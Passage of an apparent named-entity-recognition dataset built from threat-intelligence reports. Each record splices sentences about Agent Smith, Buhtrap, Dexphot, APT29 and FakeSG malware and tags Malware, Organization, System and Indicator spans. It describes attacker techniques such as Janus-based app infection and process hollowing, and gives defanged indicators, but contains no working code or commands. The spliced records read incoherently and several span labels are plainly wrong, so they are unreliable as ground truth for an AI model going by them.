Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": [{"start": 21, "end": 32, "label": "Malware"}, {"start": 210, "end": 217, "label": "Organization"}, {"start": 266, "end": 274, "label": "System"}, {"start": 479, "end": 486, "label": "Malware"}, {"start": 535, "end": 565, "label": "Organization"}, {"start": 680, "end": 704, "label": "Organization"}, {"start": 837, "end": 868, "label": "Organization"}]} {"text": "The dropper is a repacked legitimate application which contains an additional piece of code \u2013 \u201c loader \u201d . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 . The early stages of a Dexphot infection involves numerous files and processes . Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": [{"start": 139, "end": 149, "label": "Organization"}, {"start": 197, "end": 212, "label": "System"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 319, "end": 347, "label": "Malware"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 565, "end": 568, "label": "System"}]} {"text": "The loader has a very simple purpose , extract and run the \u201c core \u201d module of \u201c Agent Smith \u201d . The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign . 
During the execution stage , Dexphot writes five key files to disk : Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": [{"start": 80, "end": 91, "label": "Malware"}, {"start": 295, "end": 316, "label": "Organization"}, {"start": 408, "end": 423, "label": "System"}, {"start": 426, "end": 446, "label": "Organization"}, {"start": 609, "end": 628, "label": "System"}]} {"text": "The \u201c core \u201d module communicates with the C & C server , receiving the predetermined list of popular apps to scan the device for . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks . 1 \u3001An installer with two URLs ; Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": [{"start": 140, "end": 147, "label": "Organization"}, {"start": 232, "end": 237, "label": "System"}, {"start": 240, "end": 245, "label": "System"}, {"start": 248, "end": 258, "label": "System"}, {"start": 263, "end": 278, "label": "System"}, {"start": 420, "end": 440, "label": "Organization"}]} {"text": "If any application from that list was found , it utilizes the Janus vulnerability to inject the \u201c boot \u201d module into the repacked application . The threat actors have continually used Flash Player installers and Flash slideshows for decoys . 
2 \u3001An MSI package file downloaded from one of the URLs ; During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": [{"start": 62, "end": 67, "label": "Vulnerability"}, {"start": 184, "end": 207, "label": "System"}, {"start": 212, "end": 228, "label": "System"}, {"start": 248, "end": 251, "label": "System"}, {"start": 310, "end": 331, "label": "Organization"}, {"start": 334, "end": 339, "label": "Organization"}]} {"text": "After the next run of the infected application , the \u201c boot \u201d module will run the \u201c patch \u201d module , which hooks the methods from known ad SDKs to its own implementation . The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan area where a majority of the government of Thailand exists . 3 \u3001A password-protected ZIP archive ; They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": [{"start": 220, "end": 228, "label": "System"}, {"start": 305, "end": 315, "label": "Organization"}]} {"text": "Figure 1 : \u2018 Agent Smith \u2019 s modular structure Technical Analysis \u2013 Loader Module The \u201c loader \u201d module , as stated above , extracts and runs the \u201c core \u201d module . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 . 
4 \u3001A loader DLL , which is extracted from the archive ; APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 237, "end": 259, "label": "Organization"}, {"start": 308, "end": 311, "label": "System"}, {"start": 352, "end": 357, "label": "Organization"}]} {"text": "While the \u201c core \u201d module resides inside the APK file , it is encrypted and disguised as a JPG file \u2013 the first two bytes are actually the magic header of JPG files , while the rest of the data is encoded with an XOR cipher . At the moment , the group is known to target Russian and Ukrainian banks . 5 \u3001An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": [{"start": 293, "end": 298, "label": "Organization"}, {"start": 446, "end": 494, "label": "Organization"}]} {"text": "Figure 2 : \u201c Agent Smith \u2019 s jpg file structure After the extraction , the \u201c loader \u201d module adds the code to the application while using the legitimate mechanism by Android to handle large DEX files . Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network . Except for the installer , the other processes that run during execution are legitimate system processes . 
Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 166, "end": 173, "label": "System"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 279, "end": 283, "label": "Organization"}, {"start": 558, "end": 583, "label": "Organization"}, {"start": 586, "end": 591, "label": "Organization"}]} {"text": "Figure 3 : Loading core malicious code into the benign application Once the \u201c core \u201d module is extracted and loaded , the \u201c loader \u201d uses the reflection technique to initialize and start the \u201c core \u201d module . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . This can make detection and remediation more difficult . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": [{"start": 242, "end": 259, "label": "Malware"}, {"start": 314, "end": 318, "label": "Organization"}, {"start": 440, "end": 466, "label": "Organization"}, {"start": 483, "end": 485, "label": "System"}, {"start": 488, "end": 502, "label": "System"}, {"start": 509, "end": 535, "label": "System"}]} {"text": "Figure 4 : Loader calls initialization method Technical Analysis \u2013 Core Module With the main purpose of spreading the infection , \u201c Agent Smith \u201d implements in the \u201c core \u201d module : A series of \u2018 Bundle \u2019 vulnerabilities , which is used to install applications without the victim \u2019 s awareness . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . 
These legitimate system processes include msiexec.exe ( for installing MSI packages ) , unzIP . During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": [{"start": 132, "end": 143, "label": "Malware"}, {"start": 196, "end": 202, "label": "Vulnerability"}, {"start": 303, "end": 311, "label": "Malware"}, {"start": 360, "end": 373, "label": "Vulnerability"}, {"start": 376, "end": 389, "label": "Vulnerability"}, {"start": 393, "end": 406, "label": "Vulnerability"}, {"start": 516, "end": 527, "label": "Indicator"}, {"start": 545, "end": 548, "label": "System"}, {"start": 562, "end": 567, "label": "System"}, {"start": 577, "end": 602, "label": "Organization"}, {"start": 605, "end": 610, "label": "Organization"}]} {"text": "The Janus vulnerability , which allows the actor to replace any application with an infected version . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 . exe ( for extracting files from the password-protected ZIP archive ) , rundll32.exe ( for loading the loader DLL ) , schtasks.exe ( for scheduled tasks ) , powershell.exe ( for forced updates ) . 
User Execution : Malicious Link APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link .002 User Execution : Malicious File APT29 has used various forms of spearphishing attempting to get a user to open attachments , including , but not limited to , malicious Microsoft Word documents , .pdf , and .lnk files .", "spans": [{"start": 4, "end": 9, "label": "Vulnerability"}, {"start": 144, "end": 151, "label": "Organization"}, {"start": 201, "end": 204, "label": "Indicator"}, {"start": 272, "end": 284, "label": "Indicator"}, {"start": 310, "end": 313, "label": "System"}, {"start": 318, "end": 330, "label": "Indicator"}, {"start": 357, "end": 371, "label": "Indicator"}, {"start": 414, "end": 434, "label": "Organization"}, {"start": 550, "end": 570, "label": "Organization"}]} {"text": "The \u201c core \u201d module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio.jioplay.tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan . In later stages , Dexphot targets a few other system processes for process hollowing : svchost.exe , tracert.exe , and setup.exe . 
Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": [{"start": 151, "end": 159, "label": "System"}, {"start": 160, "end": 179, "label": "Indicator"}, {"start": 180, "end": 201, "label": "Indicator"}, {"start": 202, "end": 216, "label": "Indicator"}, {"start": 217, "end": 235, "label": "Indicator"}, {"start": 236, "end": 254, "label": "Indicator"}, {"start": 255, "end": 263, "label": "Indicator"}, {"start": 264, "end": 283, "label": "Indicator"}, {"start": 284, "end": 301, "label": "Indicator"}, {"start": 302, "end": 316, "label": "Indicator"}, {"start": 317, "end": 335, "label": "Indicator"}, {"start": 336, "end": 352, "label": "Indicator"}, {"start": 353, "end": 371, "label": "Indicator"}, {"start": 372, "end": 388, "label": "Indicator"}, {"start": 389, "end": 398, "label": "Indicator"}, {"start": 447, "end": 467, "label": "System"}, {"start": 478, "end": 485, "label": "System"}, {"start": 522, "end": 535, "label": "System"}, {"start": 556, "end": 563, "label": "Malware"}, {"start": 625, "end": 636, "label": "Indicator"}, {"start": 639, "end": 650, "label": "Indicator"}, {"start": 657, "end": 666, "label": "Indicator"}, {"start": 692, "end": 706, "label": "Organization"}, {"start": 751, "end": 785, "label": "System"}]} {"text": "eterno truecaller For each application on the list , the \u201c core \u201d module checks for a matching version and MD5 hash of the installed application , and also checks for the application running in the user-space . Moreover , they used the same exploit kit Niteris as that in the Corkow case . Based on Microsoft Defender ATP signals , SoftwareBundler : Win32/ICLoader and its variants are primarily used to drop and run the Dexphot B-MAL S-MAL installer . 
During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": [{"start": 249, "end": 260, "label": "Vulnerability"}, {"start": 276, "end": 282, "label": "System"}, {"start": 299, "end": 317, "label": "System"}, {"start": 332, "end": 364, "label": "Malware"}, {"start": 460, "end": 485, "label": "Organization"}, {"start": 488, "end": 493, "label": "Organization"}]} {"text": "If all conditions are met , \u201c Agent Smith \u201d tries to infect the application . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members . The installer uses two URLs to download malicious payloads . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 30, "end": 41, "label": "Malware"}, {"start": 343, "end": 351, "label": "Organization"}, {"start": 367, "end": 378, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}]} {"text": "The \u201c core \u201d module will use one of two methods to infect the application \u2013 Decompile and Binary . However , it is still widely used , notably in Russia . These are the same two URLs that Dexphot use later to establish persistence , update the malware , and re-infect the device . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 188, "end": 195, "label": "Malware"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 347, "end": 361, "label": "System"}, {"start": 373, "end": 386, "label": "Organization"}]} {"text": "The decompile method is based on the fact that Android applications are Java-based , meaning it is possible to recompile it . 
As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing . The installer downloads an MSI package from one of the two URLs , and then launches msiexec.exe to perform a silent install . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 47, "end": 54, "label": "System"}, {"start": 215, "end": 225, "label": "Organization"}, {"start": 287, "end": 290, "label": "System"}, {"start": 344, "end": 355, "label": "Indicator"}, {"start": 419, "end": 429, "label": "Organization"}, {"start": 577, "end": 590, "label": "System"}, {"start": 594, "end": 602, "label": "System"}]} {"text": "Therefore , \u201c Agent Smith \u201d decompiles both the original application and the malicious payload and fuses them together . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal . This is the first of several instances of Dexphot employing living-off-the-land techniques , the use of legitimate system processes for nefarious purposes . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 250, "end": 257, "label": "Malware"}, {"start": 416, "end": 428, "label": "Organization"}]} {"text": "Figure 5 : core module mixes malicious payload with the original application While decompiling the original app , \u201c Agent Smith \u201d has the opportunity to modify the methods inside , replace some of the methods in the original application that handles advertisement with its own code and focus on methods communicating with \u2018 AdMob \u2019 , \u2018 Facebook \u2019 , \u2018 MoPub \u2019 and \u2018 Unity Ads \u2019 . 
The first malware we saw was the lurk downloader , which was distributed on October 26th . Dexphot \u2019s package often contains an obfuscated batch script . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 116, "end": 127, "label": "Malware"}, {"start": 324, "end": 329, "label": "System"}, {"start": 336, "end": 344, "label": "System"}, {"start": 351, "end": 356, "label": "System"}, {"start": 365, "end": 374, "label": "System"}, {"start": 412, "end": 427, "label": "System"}, {"start": 470, "end": 477, "label": "Malware"}, {"start": 541, "end": 549, "label": "Organization"}, {"start": 566, "end": 572, "label": "Organization"}]} {"text": "Figure 6 : Targeted ad network Figure 7 : Injection example After all of the required changes , \u201c Agent Smith \u201d compiles the application and builds a DEX file containing both the original code of the original application and the malicious payload . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . If the package contains this file , the script is the first thing that msiexec.exe runs when it begins the installation process . 
The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 98, "end": 109, "label": "Malware"}, {"start": 346, "end": 362, "label": "Malware"}, {"start": 366, "end": 378, "label": "Malware"}, {"start": 490, "end": 501, "label": "Indicator"}, {"start": 553, "end": 566, "label": "Organization"}, {"start": 584, "end": 598, "label": "System"}]} {"text": "In some cases , the decompilation process will fail , and \u201c Agent Smith \u201d will try another method for infecting the original application \u2013 A binary patch , which simply provides a binary file of the \u201c boot \u201d module of \u201c Agent Smith \u201d . Buhtrap is getting better at disguising the code they inject into compromised websites . The said obfuscated script is designed to check for antivirus products . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 60, "end": 71, "label": "Malware"}, {"start": 220, "end": 231, "label": "Malware"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 302, "end": 322, "label": "System"}, {"start": 404, "end": 410, "label": "Organization"}, {"start": 411, "end": 575, "label": "Indicator"}, {"start": 581, "end": 591, "label": "Organization"}]} {"text": "Once the payload is prepared , \u201c Agent Smith \u201d uses it to build another APK file , exploiting the Janus vulnerability : Figure 8 : The new infected APK file structure Solely injecting the code of the loader is not enough . With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software . Dexphot halts the infection process immediately if an antivirus product is found running . 
We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 33, "end": 44, "label": "Malware"}, {"start": 98, "end": 103, "label": "Vulnerability"}, {"start": 267, "end": 286, "label": "System"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 390, "end": 397, "label": "Malware"}, {"start": 508, "end": 516, "label": "Organization"}, {"start": 529, "end": 537, "label": "Organization"}, {"start": 546, "end": 558, "label": "Organization"}]} {"text": "As \u201c Agent Smith \u201d uses a modular approach , and as stated earlier , the original loader extracts everything from the assets , the usage of the Janus vulnerability can only change the code of the original application , not the resources . They have different functions and ways of spreading , but the same purpose \u2014 to steal money from the accounts of businesses . When we first began our research , the batch script only checked for antivirus products from Avast and AVG . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 5, "end": 16, "label": "Malware"}, {"start": 144, "end": 149, "label": "Vulnerability"}, {"start": 352, "end": 362, "label": "Organization"}, {"start": 458, "end": 463, "label": "System"}, {"start": 468, "end": 471, "label": "System"}, {"start": 474, "end": 548, "label": "Indicator"}, {"start": 552, "end": 562, "label": "Organization"}]} {"text": "This means that the only thing possible in this case is to replace its DEX file . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants . Later , Windows Defender Antivirus was added to the checklist . 
In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 150, "end": 154, "label": "System"}, {"start": 192, "end": 203, "label": "Organization"}, {"start": 214, "end": 240, "label": "System"}, {"start": 305, "end": 319, "label": "System"}]} {"text": "To overcome this issue , \u201c Agent Smith \u201d found another solution . The first encounter with Buhtrap was registered back in 2014 . If the process is not halted , Dexphot decompresses the password-protected ZIP archive from the MSI package . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": [{"start": 27, "end": 38, "label": "Malware"}, {"start": 160, "end": 167, "label": "Malware"}, {"start": 225, "end": 228, "label": "System"}, {"start": 249, "end": 347, "label": "Indicator"}]} {"text": "Seeing as the system loader of the DEX files ( ART ) fully ignores everything that goes after the data section , the patcher writes all of its resources right there . For now , we can call RTM one of the most active financial Trojans . The password to this archive is within the MSI package . As a result , we decided to call this variant FakeSG .", "spans": [{"start": 189, "end": 192, "label": "System"}, {"start": 216, "end": 225, "label": "Organization"}, {"start": 279, "end": 282, "label": "System"}, {"start": 339, "end": 345, "label": "Organization"}]} {"text": "This action changes the original file size of the DEX file , which makes the malicious resources a part of the DEX file , a section that is ignored by the signature validation process . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments \u2014 to the tune of at least $150,000 per hit . Along with the password , the malware \u2019s authors also include a clean version of unzIP . 
2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 277, "end": 301, "label": "Organization"}, {"start": 428, "end": 433, "label": "System"}, {"start": 472, "end": 485, "label": "Organization"}]} {"text": "Figure 9 : Malware secretly adds malicious resources to the DEX file Now , after the alteration of the original application , Android \u2019 s package manager will think that this is an update for the application signed by the same certificate , but in reality , it will execute the malicious DEX file . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery . exe so that they do n\u2019t have to rely on the target system having a ZIP utility . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 126, "end": 133, "label": "System"}, {"start": 425, "end": 428, "label": "Indicator"}, {"start": 492, "end": 503, "label": "System"}, {"start": 519, "end": 527, "label": "Organization"}]} {"text": "Even now , this is still not enough . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan . The unzIP . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 134, "end": 150, "label": "System"}, {"start": 157, "end": 162, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 189, "end": 272, "label": "Indicator"}, {"start": 279, "end": 292, "label": "System"}, {"start": 304, "end": 318, "label": "Malware"}]} {"text": "\u201c Agent Smith \u201d needs to be updated/installed without the user \u2019 s consent . Just like last time , Buhtrap is spreading through exploits embedded in news outlets . 
exe file in the package is usually named various things , such as z.exe or ex.exe , to avoid scrutiny . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 149, "end": 161, "label": "Organization"}, {"start": 164, "end": 167, "label": "Indicator"}, {"start": 230, "end": 235, "label": "Indicator"}, {"start": 239, "end": 245, "label": "Indicator"}, {"start": 268, "end": 280, "label": "Organization"}, {"start": 326, "end": 339, "label": "Organization"}]} {"text": "To achieve this , \u201c Agent Smith \u201d utilizes a series of 1-day vulnerabilities , which allows any application to run an activity inside a system application , even if this activity is not exported . Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each . The ZIP archive usually contains three files : the loader DLL , an encrypted data file ( usually named bin.dat ) , and , often , one clean unrelated DLL , which is likely included to mislead detection . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 20, "end": 31, "label": "Malware"}, {"start": 55, "end": 76, "label": "Vulnerability"}, {"start": 393, "end": 407, "label": "System"}, {"start": 449, "end": 456, "label": "Indicator"}, {"start": 479, "end": 498, "label": "System"}, {"start": 549, "end": 555, "label": "Organization"}, {"start": 556, "end": 636, "label": "Indicator"}]} {"text": "The malicious application sends a request to choose a network account , a specific account that can only be processed by authentication services exported by the malicious application . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses . Dexphot usually extracts the decompressed files to the target system \u2019s Favorites folder . 
The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 276, "end": 298, "label": "Organization"}, {"start": 310, "end": 320, "label": "Organization"}, {"start": 323, "end": 330, "label": "Malware"}, {"start": 395, "end": 411, "label": "System"}, {"start": 493, "end": 503, "label": "Organization"}]} {"text": "The system service \u2018 AccountManagerService \u2019 looks for the application that can process this request . \" Buhgalter \" means \" accountant \" in Russian . The files are given new , random names , which are generated by concatenating words and numbers based on the time of execution ( for example , C:\\Users\\\\Favorites\\\\Res.Center.ponse\\ ) . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 375, "end": 413, "label": "Organization"}]} {"text": "While doing so , it will reach a service exported by \u201c Agent Smith \u201d , and sends out an authentication request that would lead to a call to the \u2018 addAccount \u2019 method . Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind . Msiexec.exe next calls rundll32.exe , specifying loader DLL E-TOOL ( urlmon.7z in the example above ) in order to decrypt the data file . 
The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 55, "end": 66, "label": "Malware"}, {"start": 213, "end": 228, "label": "System"}, {"start": 243, "end": 249, "label": "Organization"}, {"start": 254, "end": 263, "label": "Organization"}, {"start": 280, "end": 291, "label": "Indicator"}, {"start": 303, "end": 315, "label": "Indicator"}, {"start": 329, "end": 335, "label": "System"}, {"start": 336, "end": 346, "label": "System"}, {"start": 349, "end": 358, "label": "Indicator"}, {"start": 394, "end": 415, "label": "Malware"}, {"start": 486, "end": 492, "label": "System"}, {"start": 495, "end": 519, "label": "Indicator"}, {"start": 525, "end": 530, "label": "System"}, {"start": 533, "end": 559, "label": "Indicator"}]} {"text": "Then , a request is formed in such a way that an activity that installs the application is called , bypassing all security checks . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on . The decryption process involves ADD and XOR operations , using a key hardcoded in the binary . 
We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 193, "end": 201, "label": "System"}, {"start": 230, "end": 260, "label": "System"}, {"start": 307, "end": 310, "label": "System"}, {"start": 449, "end": 459, "label": "Organization"}]} {"text": "Figure 10 : The algorithm of the malicious update , while \u201c Agent Smith \u201d updates application If all that has failed , \u201c Agent Smith \u201d turns to Man-in-the-Disk vulnerability for \u2018 SHAREit \u2019 or \u2018 Xender \u2019 applications . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator . The decrypted data contains three executables . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 60, "end": 71, "label": "Malware"}, {"start": 121, "end": 132, "label": "Malware"}, {"start": 144, "end": 159, "label": "Vulnerability"}, {"start": 180, "end": 187, "label": "System"}, {"start": 195, "end": 201, "label": "System"}, {"start": 247, "end": 261, "label": "Malware"}, {"start": 283, "end": 309, "label": "Organization"}, {"start": 324, "end": 331, "label": "Organization"}, {"start": 350, "end": 371, "label": "Organization"}, {"start": 470, "end": 478, "label": "Organization"}, {"start": 520, "end": 534, "label": "System"}]} {"text": "This is a very simple process , which is replacing their update file on SD card with its own malicious payload . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Unlike the files described earlier , these executables are never written to the filesystem . 
The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": [{"start": 172, "end": 178, "label": "Malware"}, {"start": 183, "end": 208, "label": "Malware"}, {"start": 363, "end": 407, "label": "Indicator"}, {"start": 470, "end": 484, "label": "System"}]} {"text": "Figure 11 : \u2018 Agent Smith \u2019 uses man-in-disk to install the malicious update Technical Analysis \u2013 Boot Module The \u201c boot \u201d module is basically another \u201c loader \u201d module , but this time it \u2019 s executed in the infected application . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . Instead , they exist only in memory , and Dexphot runs them by loading them into other system processes via process hollowing . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 33, "end": 44, "label": "Vulnerability"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 380, "end": 387, "label": "Malware"}, {"start": 446, "end": 463, "label": "System"}, {"start": 466, "end": 556, "label": "Indicator"}, {"start": 562, "end": 577, "label": "System"}, {"start": 580, "end": 698, "label": "Malware"}, {"start": 701, "end": 715, "label": "Malware"}]} {"text": "The purpose of this module is to extract and execute a malicious payload \u2013 the \u201c patch \u201d module . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . Process hollowing is a technique that can hide malware within a legitimate system process . 
Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 128, "end": 139, "label": "System"}, {"start": 202, "end": 219, "label": "System"}, {"start": 294, "end": 313, "label": "Organization"}, {"start": 375, "end": 389, "label": "Malware"}, {"start": 390, "end": 492, "label": "Indicator"}]} {"text": "The infected application contains its payload inside the DEX file . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post . It replaces the contents of the legitimate process with malicious code . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 120, "end": 130, "label": "Organization"}, {"start": 195, "end": 210, "label": "Organization"}, {"start": 328, "end": 388, "label": "Indicator"}]} {"text": "All that is needed is to get the original size of the DEX file and read everything that comes after this offset . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . Detecting malicious code hidden using this method is not trivial , so process hollowing has become a prevalent technique used by malware today . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": [{"start": 118, "end": 131, "label": "Vulnerability"}, {"start": 268, "end": 285, "label": "System"}, {"start": 423, "end": 437, "label": "System"}, {"start": 441, "end": 456, "label": "Indicator"}]} {"text": "Figure 12 : Boot module After the patch module is extracted , the \u201c boot \u201d module executes it , using the same method described in the \u201c loader \u201d module . 
In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products . This method has the additional benefit of being fileless : the code can be run without actually being saved on the file system . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 235, "end": 257, "label": "System"}, {"start": 389, "end": 409, "label": "Malware"}, {"start": 442, "end": 457, "label": "Organization"}]} {"text": "The \u201c boot \u201d module has placeholder classes for the entry points of the infected applications . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Not only is it harder to detect the malicious code while it \u2019s running , it \u2019s harder to find useful forensics after the process has stopped . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 125, "end": 131, "label": "Malware"}, {"start": 409, "end": 419, "label": "Organization"}, {"start": 426, "end": 439, "label": "Malware"}, {"start": 522, "end": 533, "label": "Organization"}, {"start": 542, "end": 553, "label": "System"}, {"start": 569, "end": 583, "label": "Malware"}]} {"text": "This allows the \u201c boot \u201d module to execute the payloads when the infected application is started . Most modules were created in 2012 . To initiate process hollowing , the loader DLL E-TOOL targets two legitimate system processes , for example svchost.exe or nslookup.exe , and spawns them in a suspended state . 
Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 147, "end": 164, "label": "System"}, {"start": 167, "end": 177, "label": "System"}, {"start": 178, "end": 188, "label": "System"}, {"start": 243, "end": 254, "label": "Indicator"}, {"start": 258, "end": 270, "label": "Indicator"}, {"start": 350, "end": 364, "label": "Malware"}]} {"text": "Figure 13 : placeholder classes in Boot module Technical Analysis \u2013 Patch Module When \u201c Agent Smith \u201d has reached its goal \u2013 a malicious payload running inside the original application , with hooks on various methods \u2013 at this point , everything lies with maintaining the required code in case of an update for the original application . The attackers began taking them offline in January 2014 . The loader DLL E-TOOL replaces the contents of these processes with the first and second decrypted executables . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 88, "end": 99, "label": "Malware"}, {"start": 396, "end": 406, "label": "System"}, {"start": 407, "end": 417, "label": "System"}, {"start": 573, "end": 589, "label": 